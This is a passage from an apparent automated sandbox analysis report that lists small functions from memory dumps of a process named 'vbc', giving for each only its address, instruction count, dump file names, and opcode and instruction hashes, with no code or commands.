                                                                                                                                                                                            • Opcode Fuzzy Hash: a840a1a039c8346cd60d8c3a1ed5f72a176f0d65dd38c4f042f893cbdf8faff8
                                                                                                                                                                                            • Instruction Fuzzy Hash: A3F03070501B058FD724DF26E50C966BBF6FF88301740852EE44BC2A56DB70A945CF94
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 09F96290 Relevance: .0, Instructions: 26COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.425977503.0000000009F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F90000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9f90000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: bda373c434cae03371f1b394779346546508bdc04e216b03c136e2e4b9a0417c
                                                                                                                                                                                            • Instruction ID: 8e738f2fd0a85e967357d1f43db600c3ddccddd506ff826393e0a2fd42416c77
                                                                                                                                                                                            • Opcode Fuzzy Hash: bda373c434cae03371f1b394779346546508bdc04e216b03c136e2e4b9a0417c
                                                                                                                                                                                            • Instruction Fuzzy Hash: 88E09235B00218EFCB11DFE9D581B9EBBEDEB48220F0084ADE50AC7741EB71AC408B90
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 07360470 Relevance: .0, Instructions: 26COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.419256327.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7360000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: f625d728f38ec3a56e9bb4770ef5ff3a8c970f0b8c004a9bcf0a3fa080ec8ce8
                                                                                                                                                                                            • Instruction ID: 71ed886921c2c1cfbd7d50e875e797a58489a6506c4e2cbd289f9b08ef6a8b2b
                                                                                                                                                                                            • Opcode Fuzzy Hash: f625d728f38ec3a56e9bb4770ef5ff3a8c970f0b8c004a9bcf0a3fa080ec8ce8
                                                                                                                                                                                            • Instruction Fuzzy Hash: B2E092B990820CEFDB10EFB8E55A6ED7BA8EB41215F0048EAD40897745DB315A918BE0
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0736C908 Relevance: .0, Instructions: 26COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.419256327.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7360000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: f91b16e96f1b3b224e9590135abe5129dca7b3c08c41ee8c910a15a0b21006b5
                                                                                                                                                                                            • Instruction ID: 8d06777724bca48b2a8b95f7c0c4c0ef25633b44e85c20b5bf01aea71b5c69cf
                                                                                                                                                                                            • Opcode Fuzzy Hash: f91b16e96f1b3b224e9590135abe5129dca7b3c08c41ee8c910a15a0b21006b5
                                                                                                                                                                                            • Instruction Fuzzy Hash: 7DE0DF31309208AB8B042B7AB94CD5ABA5FD7C9225B40487EF50AC33028E651C0183B5
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 09F9C22F Relevance: .0, Instructions: 25COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.425977503.0000000009F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F90000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9f90000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 987eb286821b935ef18f104b2c9091ed6e7bdf2e4956dc8f8adf80b6b65d793f
                                                                                                                                                                                            • Instruction ID: 0797a4d82afa01b86808eba473e688b2f9d24e5d385d0f37748f7322488c8764
                                                                                                                                                                                            • Opcode Fuzzy Hash: 987eb286821b935ef18f104b2c9091ed6e7bdf2e4956dc8f8adf80b6b65d793f
                                                                                                                                                                                            • Instruction Fuzzy Hash: 0CF03930914388DFCB11DFA8D0692ACBFF4EF0A301F1481EAD884D3266DB314A55EB40
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 07364B90 Relevance: .0, Instructions: 25COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.419256327.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7360000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 985907096984f1622d323285d239f09209d3fdee452cfcf79b8fd2852cd0077b
                                                                                                                                                                                            • Instruction ID: 5493795ce3bfd9b6f5364b3aceb20482d4105df3fdc3c682dbe9a444ed08ffb4
                                                                                                                                                                                            • Opcode Fuzzy Hash: 985907096984f1622d323285d239f09209d3fdee452cfcf79b8fd2852cd0077b
                                                                                                                                                                                            • Instruction Fuzzy Hash: 8AE065302057588FC714972DE54CA9E7BE6DB81219F00087DD147C7B53CB656C4987D5
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 09F9D060 Relevance: .0, Instructions: 24COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.425977503.0000000009F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F90000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9f90000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: e856069179e6a4c57dd322bcb990d0fff3a6e6182c7f5727bc8ee4bbcae9785a
                                                                                                                                                                                            • Instruction ID: 926c4fd605a61f80ab72af684340f34503f00d625b59be54a2f73dae15507daf
                                                                                                                                                                                            • Opcode Fuzzy Hash: e856069179e6a4c57dd322bcb990d0fff3a6e6182c7f5727bc8ee4bbcae9785a
                                                                                                                                                                                            • Instruction Fuzzy Hash: 3EF039349143889FCB45DFB8941929CBFF0EF0A221F1441EBD844D7262D6315A55CF51
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 073694C8 Relevance: .0, Instructions: 23COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.419256327.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7360000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 12253d3d851b8e2798040b99c972941388ac68c7b9b723fa1bf2c23ef5bf94ed
                                                                                                                                                                                            • Instruction ID: 25a5f273e737ea53307898a57529c29314d21df2e430f38410a0868c87a65497
                                                                                                                                                                                            • Opcode Fuzzy Hash: 12253d3d851b8e2798040b99c972941388ac68c7b9b723fa1bf2c23ef5bf94ed
                                                                                                                                                                                            • Instruction Fuzzy Hash: 2FE092305487148FC354EB2DEA8D89E77D79F851563808D39905A87B10DF707C4D87E1
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 07361D20 Relevance: .0, Instructions: 23COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.419256327.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7360000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 1811f253c43ccad17b0cf0bd530bc27ac3ccac6bb1334396faef7a4b2c74ec30
                                                                                                                                                                                            • Instruction ID: 8efa27ddd5020449d2876be7230994d2fb2264cf67493a06d82bc56898fe0848
                                                                                                                                                                                            • Opcode Fuzzy Hash: 1811f253c43ccad17b0cf0bd530bc27ac3ccac6bb1334396faef7a4b2c74ec30
                                                                                                                                                                                            • Instruction Fuzzy Hash: BDF039B4E0020CAFD704DFA4E445BADB7B5FB44700F1082AAD8059B386E7716940CF81
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0736BC80 Relevance: .0, Instructions: 22COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.419256327.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7360000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 6d6d7b0332d673e20f7c7af00217445988692c8e1d36b3b043b801cb790d3710
                                                                                                                                                                                            • Instruction ID: 60e542064e84a4f0bdf3612eee9060c64d8e991584e2e761b9da84b8963f1bd5
                                                                                                                                                                                            • Opcode Fuzzy Hash: 6d6d7b0332d673e20f7c7af00217445988692c8e1d36b3b043b801cb790d3710
                                                                                                                                                                                            • Instruction Fuzzy Hash: 3EE0C2315092542F8705EBE898214EDBFA98F43260F0A44EBC088DF251DE71194987D5
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 07361B58 Relevance: .0, Instructions: 22COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.419256327.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7360000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 57164c9854b9725f058f728222b44d419b19d264f86a8422f51e1dbee9acbccd
                                                                                                                                                                                            • Instruction ID: 6361be480a8f06bc349407e845ebb36f3c02a873a244060f2ea8d728a42e9bc7
                                                                                                                                                                                            • Opcode Fuzzy Hash: 57164c9854b9725f058f728222b44d419b19d264f86a8422f51e1dbee9acbccd
                                                                                                                                                                                            • Instruction Fuzzy Hash: 97E0C2B56082405FD350D678E811662BBD9DF89224704847EDD4DC7B81EE72EC0283D1
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 07360437 Relevance: .0, Instructions: 21COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.419256327.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7360000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 48d7ad8be8ff80023cb19fb1d17db72c32775eb266a17def6a7555b383461084
                                                                                                                                                                                            • Instruction ID: 80c8844ea3901475c9d397c8db00d1f92a4be3f856bc984d3e4a2b8e0594421a
                                                                                                                                                                                            • Opcode Fuzzy Hash: 48d7ad8be8ff80023cb19fb1d17db72c32775eb266a17def6a7555b383461084
                                                                                                                                                                                            • Instruction Fuzzy Hash: C0D02EBC811208AAE7208AB0B40EBEA7F6CDF02302F0004A2A40882A00EB29852188E5
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 09F9D798 Relevance: .0, Instructions: 20COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.425977503.0000000009F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F90000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9f90000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 195ecc30fabfd95682705f53858bcc1fa6eb9be91e13cfa91612a9be7e73fa3b
                                                                                                                                                                                            • Instruction ID: 9cfd165d7e063488de672108ce4ad22500b559984c0df2d37deab1ef534b4836
                                                                                                                                                                                            • Opcode Fuzzy Hash: 195ecc30fabfd95682705f53858bcc1fa6eb9be91e13cfa91612a9be7e73fa3b
                                                                                                                                                                                            • Instruction Fuzzy Hash: 2CE08C70A0910DEFCB40EFB4E659A9DB7B9EB02309F2089A9E404E7341DB312F14DB85
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 073687C5 Relevance: .0, Instructions: 20COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.419256327.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7360000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 4b19277bf3b62b0e69897bf3e269fddb2e8fcfa1caddfb9b598b61f5c7b54658
                                                                                                                                                                                            • Instruction ID: a1e5c75c031082a13ff7e64dcb146a55d1bcc557805430ab8bc74c94e97537bb
                                                                                                                                                                                            • Opcode Fuzzy Hash: 4b19277bf3b62b0e69897bf3e269fddb2e8fcfa1caddfb9b598b61f5c7b54658
                                                                                                                                                                                            • Instruction Fuzzy Hash: D2E0EC367041159F9B01ABD9B988C6DB7A5FB89262350447EE505D3242DB315C108B54
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 07360480 Relevance: .0, Instructions: 20COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.419256327.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7360000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 178526974c94eca173c15881c3e8b826aa6b36da19e30e115d762ec0c7ede20b
                                                                                                                                                                                            • Instruction ID: 522a31cc23c93ee223c0d2ce2934e44cb7bfac3068b05c39ebc6d20b5e12c436
                                                                                                                                                                                            • Opcode Fuzzy Hash: 178526974c94eca173c15881c3e8b826aa6b36da19e30e115d762ec0c7ede20b
                                                                                                                                                                                            • Instruction Fuzzy Hash: C5E02670A0410CEFDB10EFB8E51AA9C77B8EB41305F0048E9C00893305DB311E10CBA0
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 073670E0 Relevance: .0, Instructions: 20COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.419256327.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7360000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: b518de0265497ea009d9dc04b8ed87ac8faa2e9812bfb82e613ee244a0cded01
                                                                                                                                                                                            • Instruction ID: 80ea2424bcfdcf9b32eff4283ef0e7fd4f67c12b721e852973e2b60328e35940
                                                                                                                                                                                            • Opcode Fuzzy Hash: b518de0265497ea009d9dc04b8ed87ac8faa2e9812bfb82e613ee244a0cded01
                                                                                                                                                                                            • Instruction Fuzzy Hash: 94E0CD716152198FEB829F10F54CD953796E782304F004DD9E5108F3CBC7601D46CB99
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 07363C20 Relevance: .0, Instructions: 20COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.419256327.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7360000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: d9163162b95c1d99ef2f673062ad377a793b54152eb809fa6d6f16516474389c
                                                                                                                                                                                            • Instruction ID: d4b7de9325088e4b1bbd4f0749e7e03c6a500135cebedc51a83b7effb7a592dd
                                                                                                                                                                                            • Opcode Fuzzy Hash: d9163162b95c1d99ef2f673062ad377a793b54152eb809fa6d6f16516474389c
                                                                                                                                                                                            • Instruction Fuzzy Hash: 88D017353005249B8A042769B55CCAE3BBEEAC5626384043AEA06C7382CFA52D0687E9
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0736C8B0 Relevance: .0, Instructions: 19COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.419256327.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7360000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: bebd42c67a83c0c0949819606a6ba0cd735326a05ca6c4ebcd57f2bb912efafe
                                                                                                                                                                                            • Instruction ID: 2e681f033d342596bc140c10c54f9620309a211c9d45bc5d0d4cdac9668b21ba
                                                                                                                                                                                            • Opcode Fuzzy Hash: bebd42c67a83c0c0949819606a6ba0cd735326a05ca6c4ebcd57f2bb912efafe
                                                                                                                                                                                            • Instruction Fuzzy Hash: 22E0D870A196844FD759CF39C055B057BB2EF49200F0184EED4028B653C734DC46CB45
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0736BCC8 Relevance: .0, Instructions: 19COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.419256327.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7360000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: d1968c5c7fa3116bc41c327ad9bcc184e4f5a01812893f805059d991e35e81d6
                                                                                                                                                                                            • Instruction ID: bdf348b9e6ea682a5ed4a7dcfe720d8499acaaecc641cd8532b8d5de2a74aaa7
                                                                                                                                                                                            • Opcode Fuzzy Hash: d1968c5c7fa3116bc41c327ad9bcc184e4f5a01812893f805059d991e35e81d6
                                                                                                                                                                                            • Instruction Fuzzy Hash: B7D0A932324114270904A36EA8888BE768FAACA128388043AE109CB780DFA0AC1603F6
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 09F9CA18 Relevance: .0, Instructions: 17COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.425977503.0000000009F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F90000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9f90000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: a33a07a9663f16349e7bd24d2e62a02f335a4bc04f17a8ee0f13afff0043d5a4
                                                                                                                                                                                            • Instruction ID: fdb9a2f509fef29228344b88e177a7c7a3b3e53d6fc8b7c00f77732b0e5eb755
                                                                                                                                                                                            • Opcode Fuzzy Hash: a33a07a9663f16349e7bd24d2e62a02f335a4bc04f17a8ee0f13afff0043d5a4
                                                                                                                                                                                            • Instruction Fuzzy Hash: 75E0EC74D2124CDFCB40DFA8E55969CBFF8EB08301F1081AAD94893350E7319A54CB91
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 09F9D070 Relevance: .0, Instructions: 17COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.425977503.0000000009F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F90000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9f90000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 06d27bf7a8b76ce7034f7dcb83ebc90b44e63bc3aabd2ac6f4158a7870855fb9
                                                                                                                                                                                            • Instruction ID: 354983108cb989418fcc4a008a7e69398bba7be1e6d7732a52894a1275bae472
                                                                                                                                                                                            • Opcode Fuzzy Hash: 06d27bf7a8b76ce7034f7dcb83ebc90b44e63bc3aabd2ac6f4158a7870855fb9
                                                                                                                                                                                            • Instruction Fuzzy Hash: 96E0EC34D1124CDFCB44DFA8E54969CBFF8EB08311F5081A9D90893354E7319A54CF81
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 09F9C240 Relevance: .0, Instructions: 17COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.425977503.0000000009F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F90000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_9f90000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 2ab79abd4590b95aa0c18ba8654b082c906c3184b33ac3665ff6d0214cf515fc
                                                                                                                                                                                            • Instruction ID: b155f88a3650b02ad6971e0cd925c39e65e2e6df8849b6814eaf79eb81a43f66
                                                                                                                                                                                            • Opcode Fuzzy Hash: 2ab79abd4590b95aa0c18ba8654b082c906c3184b33ac3665ff6d0214cf515fc
                                                                                                                                                                                            • Instruction Fuzzy Hash: DAE0E274E1124CEFCB40EFA8E54969DBFF8EB08301F1081AAD908E3345EB319A54DB81
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 07368718 Relevance: .0, Instructions: 16COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.419256327.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7360000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 76e11ed3ef036714006e47df59691bcf2533e5dc0195ab61e1a78dc982519f75
                                                                                                                                                                                            • Instruction ID: 6f97f1ec1cf2e8ace9fbb07c07355d3d48498aa99dfed6555f0483ffd745ae06
                                                                                                                                                                                            • Opcode Fuzzy Hash: 76e11ed3ef036714006e47df59691bcf2533e5dc0195ab61e1a78dc982519f75
                                                                                                                                                                                            • Instruction Fuzzy Hash: FAD05E2231D1D00FC74353B835245E8AF628ACB01634A10EBE5C1C73A3CD144C0AC355
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0736BC90 Relevance: .0, Instructions: 16COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.419256327.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7360000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 3f0c6711eb3037d954e96152f862e5a9ede055effd2c5d31d0c05699b4b1db7b
                                                                                                                                                                                            • Instruction ID: 14cd3f50cbc1199ae04906e8d686b4b0ec347f075fefb7d08837ec11fe6b85c4
                                                                                                                                                                                            • Opcode Fuzzy Hash: 3f0c6711eb3037d954e96152f862e5a9ede055effd2c5d31d0c05699b4b1db7b
                                                                                                                                                                                            • Instruction Fuzzy Hash: 56D012726043286B0754EBA968105DEBF9EDB84174F15446BD50DD7740EEB1294443E9
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 07360448 Relevance: .0, Instructions: 14COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.419256327.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7360000_vbc.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: e758088acd9c93d831cb68f641269c73e09028060c8c16a95ab1536f11e61b74
                                                                                                                                                                                            • Instruction ID: 3374efb82ce24d7bccbfa4bccd6af069f61eddfad923168821631a497bd72bf6
                                                                                                                                                                                            • Opcode Fuzzy Hash: e758088acd9c93d831cb68f641269c73e09028060c8c16a95ab1536f11e61b74
